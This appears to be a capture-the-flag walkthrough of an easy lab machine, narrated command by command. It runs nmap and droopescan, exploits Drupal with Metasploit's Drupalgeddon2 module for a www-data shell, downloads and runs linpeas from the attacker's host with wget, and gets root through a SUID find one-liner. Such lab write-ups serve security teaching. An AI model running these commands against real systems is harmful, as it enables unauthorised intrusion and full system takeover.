RATING
Easy
ENUMERATION
We kick it off with our usual nmap scan:
Command: nmap -sV -sC -T4 -Pn -p- 192.168.210.193
SSH and RPC won’t help us here, so we navigate over in our browser and discover Drupal CMS running:
Since we do not have any login credentials, we scan the site using droopescan:
Command: droopescan scan -u http://192.168.210.193
EXPLOITATION
We see the site is possibly running some variation of 7.x version of Drupal, so we use searchsploit to see what exploits are available.
We see that exploit Drupalgeddon2 is built into metasploit:
Command: searchsploit drupal 7.x
We launch metasploit and execute this payload to gain our initial shell as user www-data:
Command: use exploit/unix/webapp/drupal_drupalgeddon2
Command: set lhost 192.168.45.235
Command: set rhosts 192.168.210.193
Command: run
Command: shell
Command: /bin/bash -i
PRIVILEGE ESCALATION
After transferring linpeas over to the target, we execute it and discover that the binary find has SUID permission:
Command: python3 -m http.server 80 (on attacker machine)
Command: wget http://192.168.45.235/linpeas.sh (on target machine)
Command: chmod +x linpeas.sh
Command: ./linpeas.sh
Heading over to GTFOBins, we see that we can use the find binary to escalate our shell to root:
As simple as that, we have a root shell and can retrieve our flag:
Command: find . -exec /bin/sh \; -quit
